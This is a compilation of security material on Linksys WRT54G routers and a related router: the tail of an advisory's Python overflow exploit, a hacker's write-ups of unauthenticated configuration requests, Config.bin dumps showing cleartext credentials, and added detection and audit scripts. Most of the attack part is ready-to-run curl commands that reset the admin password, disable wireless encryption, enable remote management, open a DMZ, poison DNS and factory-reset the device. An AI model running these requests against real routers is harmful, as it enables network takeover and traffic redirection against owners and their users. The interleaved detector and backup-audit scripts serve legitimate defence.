SERVER_IP_ADDRESS = '192.168.0.1'
# 127 'a' characters: the same username as in the decoded Authorization header above
USERNAME = 'a' * 127
NEW_PASSWORD = 'owned'
auth_handler = urllib2.HTTPBasicAuthHandler()
auth_handler.add_password('LOGIN(default username & password is admin)', SERVER_IP_ADDRESS, USERNAME, NEW_PASSWORD)
opener = urllib2.build_opener(auth_handler)
urllib2.install_opener(opener)
res = urllib2.urlopen('http://' + SERVER_IP_ADDRESS + '/home/index.shtml')
###### CUT HERE ######
*** FIX INFORMATION ***
N/A
*** WORKAROUNDS ***
N/A
*** CONTACT ***
E-mail: securenetwork[at]securenetwork.it
GPG/PGP key: http://www.securenetwork.it/pgpkeys/Secure Network.asc
Phone: +39 0363 560 404
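A defender-side complement to the advisory, added here and not part of it: parse an HTTP request, reassemble a Basic token that was wrapped onto continuation lines (as the advisory's own listing shows it), decode it and flag a username long enough to reach the 127-character trigger described above. The threshold, the sample requests and the helper names are constructed.

```python
import base64
import binascii
from typing import Optional, Tuple

# Constructed detection threshold: the advisory's trigger is a username of 127 or
# more characters and real admin names are a handful, so 100 catches it with margin.
MAX_USERNAME_LEN = 100


def parse_headers(raw: str) -> dict:
    """Map lower-cased header names to values. Continuation lines are appended to
    the previous header, whether indented (RFC 2616 folding) or bare as in the
    advisory's listing, so a Basic token wrapped at 76 columns is reassembled."""
    headers, last = {}, None
    for line in raw.replace("\r\n", "\n").split("\n")[1:]:   # [0] is the request line
        if not line.strip():
            break                                            # blank line ends headers
        if line[0] in " \t" or ":" not in line:
            if last is not None:
                headers[last] += " " + line.strip()
            continue
        name, _, value = line.partition(":")
        last = name.strip().lower()
        headers[last] = value.strip()
    return headers


def decode_basic(value: str) -> Optional[Tuple[bytes, bytes]]:
    """Return (username, password) from a 'Basic <b64>' value, None if undecodable."""
    scheme, _, token = value.partition(" ")
    if scheme.lower() != "basic":
        return None
    try:
        raw = base64.b64decode(token.replace(" ", ""), validate=True)
    except (binascii.Error, ValueError):
        return None
    user, _, password = raw.partition(b":")
    return user, password


def check_request(raw: str) -> dict:
    """Flag requests whose Basic credentials cannot be decoded or carry an
    implausibly long username (the overflow precondition in the advisory)."""
    result = {"suspicious": False, "reason": "", "username_len": 0}
    auth = parse_headers(raw).get("authorization")
    if auth is None:
        return result
    creds = decode_basic(auth)
    if creds is None:
        result.update(suspicious=True, reason="undecodable Basic credentials")
        return result
    user, _ = creds
    result["username_len"] = len(user)
    if len(user) > MAX_USERNAME_LEN:
        result.update(suspicious=True,
                      reason=f"Basic username of {len(user)} bytes exceeds {MAX_USERNAME_LEN}")
    return result


def build_request(user: bytes, password: bytes, fold_at: int = 0) -> str:
    """Constructed request; fold_at > 0 wraps the token onto bare continuation lines."""
    token = base64.b64encode(user + b":" + password).decode()
    if fold_at:
        pieces = [token[i:i + fold_at] for i in range(0, len(token), fold_at)]
        auth = "Authorization: Basic\r\n" + "\r\n".join(pieces)
    else:
        auth = "Authorization: Basic " + token
    return "GET / HTTP/1.1\r\nHost: 192.168.0.1\r\n" + auth + "\r\n\r\n"


BENIGN = build_request(b"admin", b"admin")
OVERFLOW = build_request(b"a" * 127, b"owned")             # the advisory's example
OVERFLOW_FOLDED = build_request(b"a" * 127, b"owned", 76)  # wrapped like the listing
```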
@author: meathive
@Router type: WRT54G firmware version: v1.00.9
@Manufacturer: Linksys
url: kinqpinz.info ;]
Tue, 05 Feb 2008 07:51:41 -0700
############################################################################
WRT54G firmware version: v1.00.9
Default LAN IP: 192.168.1.1
Default auth: user:blank - pass:admin
Authorization: Basic OmFkbWlu
php > print base64_decode('OmFkbWlu');
:admin
############################################################################
/******************************
* No Authentication Required! *
******************************/
############################################################################
What:
restore basic setup options to default.
Where:
http://192.168.1.1/Basic.tri?dhcp_end=149&oldMtu=1500&oldLanSubnet=0&OldWanMode=0&SDHCP1=192&SDHCP2=168&SDHCP3=1&SDHCP4=100&EDHCP1=192&EDHCP2=168&EDHCP3=1&EDHCP4=150&pd=&now_proto=dhcp&old_domain=&chg_lanip=192.168.1.1&_daylight_time=1&wan_proto=0&router_name=WRT54G&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=0&lan_proto=Enable&dhcp_start=100&dhcp_num=50&dhcp_lease=0&dns0_0=0&dns0_1=0&dns0_2=0&dns0_3=0&dns1_0=0&dns1_1=0&dns1_2=0&dns1_3=0&dns2_0=0&dns2_1=0&dns2_2=0&dns2_3=0&wins_0=0&wins_1=0&wins_2=0&wins_3=0&time_zone=%28GMT-08%3A00%29+Pacific+Time+%28USA+%26+Canada%29&daylight_time=ON&layout=en
How:
curl -d
'dhcp_end=149&oldMtu=1500&oldLanSubnet=0&OldWanMode=0&SDHCP1=192&SDHCP2=168&SDHCP3=1&SDHCP4=100&EDHCP1=192
&EDHCP2=168&EDHCP3=1&EDHCP4=150&pd=&now_proto=dhcp&old_domain=&chg_lanip=192.168.1.1&_daylight_time=1&
wan_proto=0&router_name=WRT54G&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1
&lan_ipaddr_3=1&lan_netmask=0&lan_proto=Enable&dhcp_start=100&dhcp_num=50&dhcp_lease=0&dns0_0=0&dns0_1=0
&dns0_2=0&dns0_3=0&dns1_0=0&dns1_1=0&dns1_2=0&dns1_3=0&dns2_0=0&dns2_1=0&dns2_2=0&dns2_3=0&wins_0=0
&wins_1=0&wins_2=0&wins_3=0&time_zone=%28GMT-08%3A00%29+Pacific+Time+%28USA+%26+Canada%29&daylight_time=ON&layout=en'
http://192.168.1.1/Basic.tri
############################################################################
What:
reset administrative password to 'asdf'.
Where:
http://192.168.1.1/manage.tri?remote_mgt_https=0&http_enable=1&https_enable=0&PasswdModify=1&http_passwd=asdf&
http_passwdConfirm=asdf&_http_enable=1&web_wl_filter=1&remote_management=0&upnp_enable=1&layout=en
How:
curl -d
'remote_mgt_https=0&http_enable=1&https_enable=0&PasswdModify=1&
http_passwd=asdf&http_passwdConfirm=asdf&_http_enable=1&web_wl_filter=1
&remote_management=0&upnp_enable=1&layout=en' http://192.168.1.1/manage.tri
############################################################################
What:
enable mixed wireless network mode with SSID 'pwnage' on channel 6, SSID broadcasting enabled.
Where:
http://192.168.1.1/WBasic.tri?submit_type=&channelno=11&OldWirelessMode=3&Mode=3&SSID=pwnage&channel=6
&Freq=6&wl_closed=1&sesMode=1&layout=en
How:
curl -d
'submit_type=&channelno=11&OldWirelessMode=3&Mode=3&SSID=pwnage&channel=6&Freq=6&wl_closed=1
&sesMode=1&layout=en' http://192.168.1.1/WBasic.tri
############################################################################
What:
disable all wireless encryption.
Where:
http://192.168.1.1/Security.tri?SecurityMode=0&layout=en
How:
curl -d 'SecurityMode=0&layout=en' http://192.168.1.1/Security.tri
############################################################################
What:
disable wireless MAC filtering.
Where:
http://192.168.1.1/WFilter.tri?wl_macmode1=0
How:
curl -d 'wl_macmode1=0' http://192.168.1.1/WFilter.tri
############################################################################
What:
enable DMZ to ip 192.168.1.100.
Where:
http://192.168.1.1/dmz.tri?action=Apply&dmz_enable=1&dmz_ipaddr=100&layout=en
How:
curl -d 'action=Apply&dmz_enable=1&dmz_ipaddr=100&layout=en' http://192.168.1.1/dmz.tri
############################################################################
What:
disable DMZ.
Where:
http://192.168.1.1/dmz.tri?action=Apply&dmz_enable=0&layout=en
How:
curl -d 'action=Apply&dmz_enable=0&layout=en' http://192.168.1.1/dmz.tri
############################################################################
What:
enable remote management on port 31337 with password 'asdf', wireless web access and UPnP enabled.
Where:
http://192.168.1.1/manage.tri?remote_mgt_https=0&http_enable=1&https_enable=0&PasswdModify=1&http_passwd=asdf
&http_passwdConfirm=asdf&_http_enable=1&web_wl_filter=1&remote_management=1&http_wanport=31337
&upnp_enable=1&layout=en
How:
curl -d
'remote_mgt_https=0&http_enable=1&https_enable=0&PasswdModify=1&http_passwd=asdf&http_passwdConfirm=asdf
&_http_enable=1&web_wl_filter=1&remote_management=1&http_wanport=31337&upnp_enable=1&layout=en'
http://192.168.1.1/manage.tri
############################################################################
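The requests above share three traits a defender can look for on the LAN side: the target is a `.tri` configuration endpoint, there is no Authorization header, and the parameters change something security-relevant (admin password, remote management, DNS servers, wireless encryption, DMZ, factory reset). The script below is an added example, not code from the submission, that runs that check over a few constructed proxy-log lines. The log layout (`ip "METHOD target HTTP/1.1" auth="..." referer="..." body="..."`) is an assumption of the example; the endpoint and parameter names come from the requests listed on the page, and the default-credential check decodes the same `Basic OmFkbWlu` value shown in the header block.

```python
"""Flag router-configuration requests that look like the unauthenticated
changes listed above.  Added example (not part of the original submission).
The log line format is assumed; endpoint and parameter names are from the page."""
import base64
import re
from urllib.parse import parse_qs, urlsplit

ROUTER_IP = "192.168.1.1"   # default LAN IP from the page

LOG_RE = re.compile(
    r'^(?P<ip>\S+) "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/1\.[01]"'
    r' auth="(?P<auth>[^"]*)" referer="(?P<referer>[^"]*)" body="(?P<body>[^"]*)"$'
)

# Parameter -> predicate on its value; true means "security-relevant change".
SENSITIVE = {
    "http_passwd":       lambda v: True,        # admin password set
    "remote_management": lambda v: v == "1",    # management reachable from WAN
    "SecurityMode":      lambda v: v == "0",    # wireless encryption disabled
    "wl_macmode1":       lambda v: v == "0",    # wireless MAC filter disabled
    "dmz_enable":        lambda v: v == "1",    # LAN host exposed to WAN
    "FactoryDefaults":   lambda v: v == "Yes",  # factory reset
    "log_enable":        lambda v: v == "0",    # logging switched off
}
DNS_PARAM = re.compile(r"^dns[0-2]_[0-3]$")     # dns0_0 .. dns2_3 octets


def decode_basic(auth):
    """Return (user, password) from a 'Basic <b64>' header value, or None."""
    if not auth.lower().startswith("basic "):
        return None
    try:
        raw = base64.b64decode(auth.split(" ", 1)[1]).decode("ascii")
    except Exception:
        return None
    user, _, password = raw.partition(":")
    return user, password


def analyse(line):
    """Return the list of findings for one log line ([] when nothing is flagged)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparseable log line"]
    parts = urlsplit(m["target"])
    if not parts.path.endswith(".tri"):
        return []                                   # not a configuration endpoint
    # Parameters may arrive in the query string (GET) or the form body (POST).
    params = {k: v[0] for k, v in parse_qs(parts.query).items()}
    if m["body"] != "-":
        params.update({k: v[0] for k, v in parse_qs(m["body"]).items()})

    findings = []
    if m["auth"] == "-":
        findings.append("config endpoint %s reached without Authorization" % parts.path)
    elif decode_basic(m["auth"]) == ("", "admin"):
        findings.append("default credentials (blank user / 'admin') used")
    ref = m["referer"]
    if ref != "-" and urlsplit(ref).hostname != ROUTER_IP:
        findings.append("cross-origin Referer %s (possible CSRF)" % ref)
    for k, v in params.items():
        if k in SENSITIVE and SENSITIVE[k](v):
            findings.append("%s=%s" % (k, v))
        elif DNS_PARAM.match(k) and v != "0":
            findings.append("DNS server changed: %s=%s" % (k, v))
    return findings


# Constructed sample log lines (not captured traffic).
SAMPLE_LOG = [
    # authenticated change made from the admin UI, using the default credentials
    '192.168.1.100 "POST /manage.tri HTTP/1.1" auth="Basic OmFkbWlu" '
    'referer="http://192.168.1.1/manage.asp" '
    'body="remote_mgt_https=0&http_enable=1&PasswdModify=1&http_passwd=asdf'
    '&http_passwdConfirm=asdf&remote_management=0&upnp_enable=1&layout=en"',
    # unauthenticated GET with an external Referer: the CSRF pattern from the page
    '192.168.1.101 "GET /Security.tri?SecurityMode=0&layout=en HTTP/1.1" '
    'auth="-" referer="http://external.example/index.html" body="-"',
    # DNS servers replaced through an unauthenticated POST
    '192.168.1.102 "POST /Basic.tri HTTP/1.1" auth="-" referer="-" '
    'body="dns0_0=1&dns0_1=2&dns0_2=3&dns0_3=4&dns1_0=0&dns1_1=0&dns1_2=0&dns1_3=0&layout=en"',
    # ordinary page view, not a configuration endpoint
    '192.168.1.100 "GET /index.asp HTTP/1.1" auth="Basic OmFkbWlu" referer="-" body="-"',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        for finding in analyse(line):
            print(line.split('"')[1], "->", finding)
```

The Referer test is only a heuristic: browsers may omit the header, and the page's own point is that the router does not tie requests to a session at all, so the absence of any Authorization on a `.tri` request is the stronger signal.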
/******************************
****** Defaults: ******
******************************/
############################################################################
Setup->Basic Setup:
POST /Basic.tri
dhcp_end=149&oldMtu=1500&oldLanSubnet=0&OldWanMode=0&SDHCP1=192&SDHCP2=168&SDHCP3=1&SDHCP4=100&EDHCP1=192
&EDHCP2=168&EDHCP3=1&EDHCP4=150&pd=&now_proto=dhcp&old_domain=&chg_lanip=192.168.1.1&_daylight_time=1
&wan_proto=0&router_name=WRT54G&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168
&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=0&lan_proto=Enable&dhcp_start=100&dhcp_num=50&dhcp_lease=0
&dns0_0=0&dns0_1=0&dns0_2=0&dns0_3=0&dns1_0=0&dns1_1=0&dns1_2=0&dns1_3=0&dns2_0=0
&dns2_1=0&dns2_2=0&dns2_3=0&wins_0=0&wins_1=0&wins_2=0&wins_3=0
&time_zone=%28GMT-08%3A00%29+Pacific+Time+%28USA+%26+Canada%29&daylight_time=ON&layout=en
############################################################################
Setup->DDNS:
POST /ddns.tri ddns_enable=0
############################################################################
Setup->MAC Address Clone:
POST /WanMac.tri action=Apply&mac_clone_enable=0
############################################################################
Setup->Advanced Routing:
POST /AdvRoute.tri
action=Apply&bSRoute=1&oldOpMode=0&wk_mode=0&route_page=0&
route_name=&route_ipaddr_0=0&route_ipaddr_1=0&route_ipa
ddr_2=0&route_ipaddr_3=0&route_netmask_0=0&route_netmask_1=0&
route_netmask_2=0&route_netmask_3=0&route_gateway_0=0&route_gateway_1=0
&route_gateway_2=0&route_gateway_3=0&route_ifname=0
############################################################################
Wireless->Basic Wireless Settings:
POST /WBasic.tri
submit_type=&channelno=11&OldWirelessMode=3&Mode=3&SSID=linksys&
channel=6&Freq=6&wl_closed=1&sesMode=1&layout=en
############################################################################
Wireless->Wireless Security:
POST /Security.tri SecurityMode=0&layout=en
############################################################################
Wireless->Wireless MAC Filter:
POST /WFilter.tri wl_macmode1=0
############################################################################
Wireless->Advanced Wireless Settings:
POST /Advanced.tri
AuthType=0&basicrate=default&wl_rate=0&wMode=3&sectype=0&
ctspmode=off&FrameBurst=off&BeaconInterval=100&Dtim=1&FragLen=2346
&RTSThre=2347&apisolation=0&apSESmode=1
############################################################################
Security->Firewall:
POST /fw.tri ident_pass=1&action=Apply&block_wan=1&IGMP=1&_ident_pass=1
############################################################################
Security->VPN:
POST /vpn.tri action=Apply&ipsec_pass=1&pptp_pass=1&l2tp_pass=1
############################################################################
Access Restrictions->Internet Access:
POST /filter.tri
action=Apply&f_id=0&f_status1=disable&f_name=&f_status2=1&
day_all=1&time_all=1&FROM_AMPM=0&TO_AMPM=0&blocked_serv
ice0=NONE&blocked_service1=NONE&host0=&host1=&host2=&host3=
&url0=&url1=&url2=&url3=&url4=&url5=
############################################################################
Applications & Gaming->Port Range Forward:
POST /PortRange.tri
action=Apply&RuleID_0=0&name0=&from0=0&to0=0&pro0=both&
ip0=0&RuleID_1=0&name1=&from1=0&to1=0&pro1=both&ip1=0
&RuleID_2=0&name2=&from2=0&to2=0&pro2=both&ip2=0&
RuleID_3=0&name3=&from3=0&to3=0&pro3=both&ip3=0&
RuleID_4=0&name4=&from4=0&to4=0&pro4=both&ip4=0&
RuleID_5=0&name5=&from5=0&to5=0&pro5=both&ip5=0&
RuleID_6=0&name6=&from6=0&to6=0&pro6=both&ip6=0&
RuleID_7=0&name7=&from7=0&to7=0&pro7=both&ip7=0&
RuleID_8=0&name8=&from8=0&to8=0&pro8=both&ip8=0&
RuleID_9=0&name9=&from9=0&to9=0&pro9=both&ip9=0
############################################################################
Applications & Gaming->Port Triggering:
POST /ptrigger.tri
RuleID_0=&service_name0=&tfrom0=0&tto0=0&rfrom0=0&rto0=0
&RuleID_1=&service_name1=&tfrom1=0&tto1=0&rfrom1=0&
rto1=0&RuleID_2=&service_name2=&tfrom2=0&tto2=0&rfrom2=0
&rto2=0&RuleID_3=&service_name3=&tfrom3=0&tto3=0&rfrom3=0
&rto3=0&RuleID_4=&service_name4=&tfrom4=0&tto4=0&rfrom4=0
&rto4=0&RuleID_5=&service_name5=&tfrom5=0&tto5=0&rfrom5=0
&rto5=0&RuleID_6=&service_name6=&tfrom6=0&tto6=0&rfrom6=0
&rto6=0&RuleID_7=&service_name7=&tfrom7=0&tto7=0&rfrom7=0
&rto7=0&RuleID_8=&service_name8=&tfrom8=0&tto8=0&rfrom8=0
&rto8=0&RuleID_9=&service_name9=&tfrom9=0&tto9=0&rfrom9=0
&rto9=0&trinamelist=&layout=en
############################################################################
Applications & Gaming->DMZ:
POST /dmz.tri action=Apply&dmz_enable=0&layout=en
############################################################################
Applications & Gaming->QoS:
POST /qos.tri
hport_priority_1=0&hport_priority_2=0&hport_priority_3=0&hport_priority_4=0
&hport_flow_control_1=1&hport_flow_control_2=1&hport_flow_control_3=1
&hport_flow_control_4=1&happname1=&hport1priority=0&happport1=0
&happname2=&hport2priority=0&happport2=0&happname3=&hport3priority=0
&happport3=0&happname4=&hport4priority=0&happport4=0&happname5=&
hport5priority=0&happport5=0&happname6=&hport6priority=0&happport6=0
&happname7=&hport7priority=0&happport7=0&happname8=&
hport8priority=0&happport8=0&QoS=0&wl_wme=off&layout=en
############################################################################
Administration->Management:
POST /manage.tri
remote_mgt_https=0&http_enable=1&https_enable=0&PasswdModify=1&
http_passwd=d6nw5v1x2pc7st9m&http_passwdConfirm=d6nw5v1x2pc7st9m&
_http_enable=1&web_wl_filter=1&remote_management=0&upnp_enable=1&layout=en
############################################################################
Administration->Log:
POST /ctlog.tri log_enable=0
############################################################################
Administration->Diagnostics->Ping:
POST /ping.tri action=start&ping_ip=kinqpinz.info&ping_times=5
############################################################################
Administration->Diagnostics->Trace Route:
POST /tracert.tri action=start&traceroute_ip=kinqpinz.info
############################################################################
Status->Router->DHCP Release:
POST /rstatus.tri action=release&wan_pro=0&conn_stats=4294967295&layout=en
############################################################################
Status->Router->DHCP Renew:
POST /rstatus.tri action=renew&wan_pro=0&conn_stats=4294967295&layout=en
############################################################################
@author: meathive
@Router type: WRT54G
@Manufacturer: Linksys
So with everybody poisoning DNS I may as well add another attack vector against the WRT54G! I've also added how to restore the factory defaults.
############################################################################
What:
poison dns.
dns 1 = 1.2.3.4
dns 2 = 5.6.7.8
dns 3 = 9.8.7.6
Where:
http://192.168.1.1/Basic.tri?dhcp_end=149&oldMtu=1500&oldLanSubnet=0&OldWanMode=0
&SDHCP1=192&SDHCP2=168&SDHCP3=1&SDHCP4=100&EDHCP1=192&EDHCP2=168
&EDHCP3=1&EDHCP4=150&pd=&now_proto=dhcp&old_domain=&chg_lanip=
192.168.1.1&_daylight_time=1&wan_proto=0&router_name=WRT54G&wan_hostname=
&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1
&lan_ipaddr_3=1&lan_netmask=0&lan_proto=Enable&dhcp_start=100&dhcp_num=50
&dhcp_lease=0&dns0_0=1&dns0_1=2&dns0_2=3&dns0_3=4&dns1_0=5
&dns1_1=6&dns1_2=7&dns1_3=8&dns2_0=9&dns2_1=8&dns2_2=7
&dns2_3=6&wins_0=0&wins_1=0&wins_2=0&wins_3=0&time_zone=
%28GMT-08%3A00%29+Pacific+Time+%28USA+%26+Canada%29&daylight_time=ON&layout=en
How:
curl -d
'dhcp_end=149&oldMtu=1500&oldLanSubnet=0&OldWanMode=0&SDHCP1=192&SDHCP2=168
&SDHCP3=1&SDHCP4=100&EDHCP1=192&EDHCP2=168&EDHCP3=1&EDHCP4=150&pd=
&now_proto=dhcp&old_domain=&chg_lanip=192.168.1.1&_daylight_time=1&wan_proto=0
&router_name=WRT54G&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192
&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=0&lan_proto=Enable
&dhcp_start=100&dhcp_num=50&dhcp_lease=0&dns0_0=1&dns0_1=2&dns0_2=3
&dns0_3=4&dns1_0=5&dns1_1=6&dns1_2=7&dns1_3=8&dns2_0=9&dns2_1=8
&dns2_2=7&dns2_3=6&wins_0=0&wins_1=0&wins_2=0&wins_3=0&
time_zone=%28GMT-08%3A00%29+Pacific+Time+%28USA+%26+Canada%29&daylight_time=ON&
layout=en' http://192.168.1.1/Basic.tri
############################################################################
What:
restore factory defaults.
Where:
http://192.168.1.1/factdefa.tri?FactoryDefaults=Yes&layout=en
How:
curl -d 'FactoryDefaults=Yes&layout=en' http://192.168.1.1/factdefa.tri
############################################################################
@author: meathive
@Router type: WRT54G
@Manufacturer: Linksys
A couple of new things I've found inside the default configuration file, http://192.168.1.1/Config.bin. The router uses a military NTP server, ntp2.usno.navy.mil, for synchronizing time. The device's virtual memory/file system info is located at /mem/pricf/0, which I'm still exploring. The only reference I've found in regards to /mem/pricf/0, by the way, is on a Korean site, so it's still relatively new territory. By simply viewing the ASCII within Config.bin we can view the administrative user name and password, external and internal IPs, router name, available service configurations, and so on. It becomes more interesting when the device is not left in default mode, as more information is available pertaining to what is and isn't left on. The firmware seems to come from a company named Intoto, http://www.intoto.com/company.shtml.
Here is a dump of Config.bin using the default settings:
TROC
/mem/pricf/0
(c) 2001 Copyright Intoto, Inc
5VGWJ
WRT54G
linksysrouter
self
ntp2.usno.navy.mil
root
00000000000000
mirror0
None
None
httpSharenet
mirror0
httpSharenet
httpSubnet
httpSharenet
httpSubnet
19192.168.1.1
httpSharenet
httpSubnet
PPPOE
PPPOE
PPTP
PPTP
L2TP
L2TP
PPPOE
PPPoE
Med=vl1,AC=,Fr=Sync
PPTP
PPTP
:M-2:I-0.0.0.0:F-2:B-2
L2TP
L2TP
M:2:P:0.0.0.0:K:0:A:0:F:1:B:0:T:33000:R:33300:Y:555:G:Intoto-Net:U:Intoto-India
Intoto
IntotoSoft
Intoto
WANIPConn1
WANIPConn1
—-
admin
admin
linksys
long
default
langpak_en
PING
TFTP
IMAP
HTTPS
SNMP
NNTP
POP3
SMTP
HTTP
TELNET
RegularNAT1
RegularNAT1
RegularNAT1
RegularNAT1
RegularNAT1
DefaultTcp
DefaultUdp
DefaultIcmp
ftpinac
dnsinac
hainac
gatekeeper
msgudp
tftp
pcanywhere
l2tp
rtsp554
rtsp7070
h323
msgtcp
pptp
n2pe
cuseeme
mszone
CORP
SELF
DefPoly
DefISAKMP
DefPPTP
DefL2TP
I should mention that the external IP was available to me when I dumped Config.bin after making some changes in the Web interface. By default, it is not viewable. Here the admin password is 'asdf':
TROC
/mem/pricf/0
(c) 2001 Copyright Intoto, Inc
5VGWJ
WRT54G
linksysrouter
self
ntp2.usno.navy.mil
root
00000000000000
mirror0
None
None
httpSharenet
mirror0
httpSharenet
httpSubnet
httpSharenet
httpSubnet
19192.168.1.1
httpSharenet
httpSubnet
6868.87.85.98;68.87.69.146
httpSharenet
httpSubnet
hshsd1.co.comcast.net.
httpSharenet
httpSubnet
PPPOE
PPPOE
PPTP
PPTP
L2TP
L2TP
PPPOE
PPPoE
Med=vl1,AC=,Fr=Sync
PPTP
PPTP
:M-2:I-0.0.0.0:F-2:B-2
L2TP
L2TP
M:2:P:0.0.0.0:K:0:A:0:F:1:B:0:T:33000:R:33300:Y:555:G:Intoto-Net:U:Intoto-India
Intoto
IntotoSoft
Intoto
WANIPConn1
x.x.x.x — external IP now exists!
WANIPConn1
admin
asdf
linksys
long
default
langpak_en
PING
TFTP
IMAP
HTTPS
SNMP
NNTP
POP3
SMTP
HTTP
TELNET
RegularNAT1
RegularNAT1
RegularNAT1
RegularNAT1
RegularNAT1
DefaultTcp
DefaultUdp
DefaultIcmp
ftpinac
dnsinac
hainac
gatekeeper
msgudp
tftp
pcanywhere
l2tp
rtsp554
rtsp7070
h323
msgtcp
pptp
n2pe
cuseeme
mszone
CORP
SELF
DefPoly
DefISAKMP
DefPPTP
DefL2TP
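The two dumps show why a Config.bin backup has to be treated as a secret: the admin user name, the password, the NTP host and (once set) the WAN address all sit in the file as plain ASCII. The script below is an added example, not code from the submission, that audits such a backup the way a `strings`-style pass does: it lists the printable runs, checks whether known secrets (the admin password, for instance) occur verbatim, picks out IP addresses and host names, and produces a redacted copy safe to attach to a support ticket. `SAMPLE_CONFIG` is a constructed blob that only mimics the NUL-separated layout visible in the dumps; the real file format is not documented on the page and is not assumed here.

```python
"""Audit a router configuration backup for cleartext secrets.
Added example; SAMPLE_CONFIG is a constructed stand-in for Config.bin that
imitates the NUL-separated fields of the dump above, not the real format."""
import re

IP_LIKE = re.compile(r"(?:\d{1,3}\.){3}\d{1,3}")
HOSTNAME = re.compile(r"[a-z0-9-]+(?:\.[a-z0-9-]+)+\.?")

# Constructed sample: magic, memory path, vendor string, device fields,
# LAN IP, credentials (user 'admin', password 'asdf' as in the second dump)
# and a few service names, with binary bytes in between.
SAMPLE_CONFIG = (
    b"TROC\x00\x00\x00\x10/mem/pricf/0\x00(c) 2001 Copyright Intoto, Inc\x00"
    b"\x01\x02WRT54G\x00linksysrouter\x00self\x00ntp2.usno.navy.mil\x00root\x00"
    b"\x0b" b"192.168.1.1\x00"
    b"\x00\x00\x03WANIPConn1\x00WANIPConn1\x00admin\x00asdf\x00linksys\x00"
    b"\xff\xfe\x07PING\x00TFTP\x00HTTP\x00TELNET\x00"
)


def extract_strings(blob, min_len=4):
    """Printable ASCII runs of at least min_len bytes, like strings(1)."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(blob)]


def find_cleartext_secrets(blob, secrets):
    """Return the known secrets (admin password, PSK, ...) found verbatim in the backup."""
    return [s for s in secrets if s.encode("ascii") in blob]


def redact_backup(blob, secrets):
    """Replace each secret with same-length asterisks so file offsets are preserved."""
    for s in secrets:
        blob = blob.replace(s.encode("ascii"), b"*" * len(s))
    return blob


def audit_backup(blob, known_secrets):
    """Summarise what a backup leaks: strings, secrets, IP addresses, host names."""
    strings = extract_strings(blob)
    return {
        "strings": strings,
        "cleartext_secrets": find_cleartext_secrets(blob, known_secrets),
        "ip_like": [s for s in strings if IP_LIKE.fullmatch(s)],
        "hostnames": [s for s in strings
                      if HOSTNAME.fullmatch(s) and not IP_LIKE.fullmatch(s)],
    }


if __name__ == "__main__":
    report = audit_backup(SAMPLE_CONFIG, ["asdf"])
    for key in ("cleartext_secrets", "ip_like", "hostnames"):
        print(key, report[key])
    print("redacted strings:", extract_strings(redact_backup(SAMPLE_CONFIG, ["asdf"])))
```

Running `audit_backup` against a real backup with the router's actual admin password as the known secret answers the practical question (is my password stored in the clear?) without needing to understand the rest of the format; the redaction keeps the file length so that length-prefixed fields, like the ones visible in the dump, stay intact.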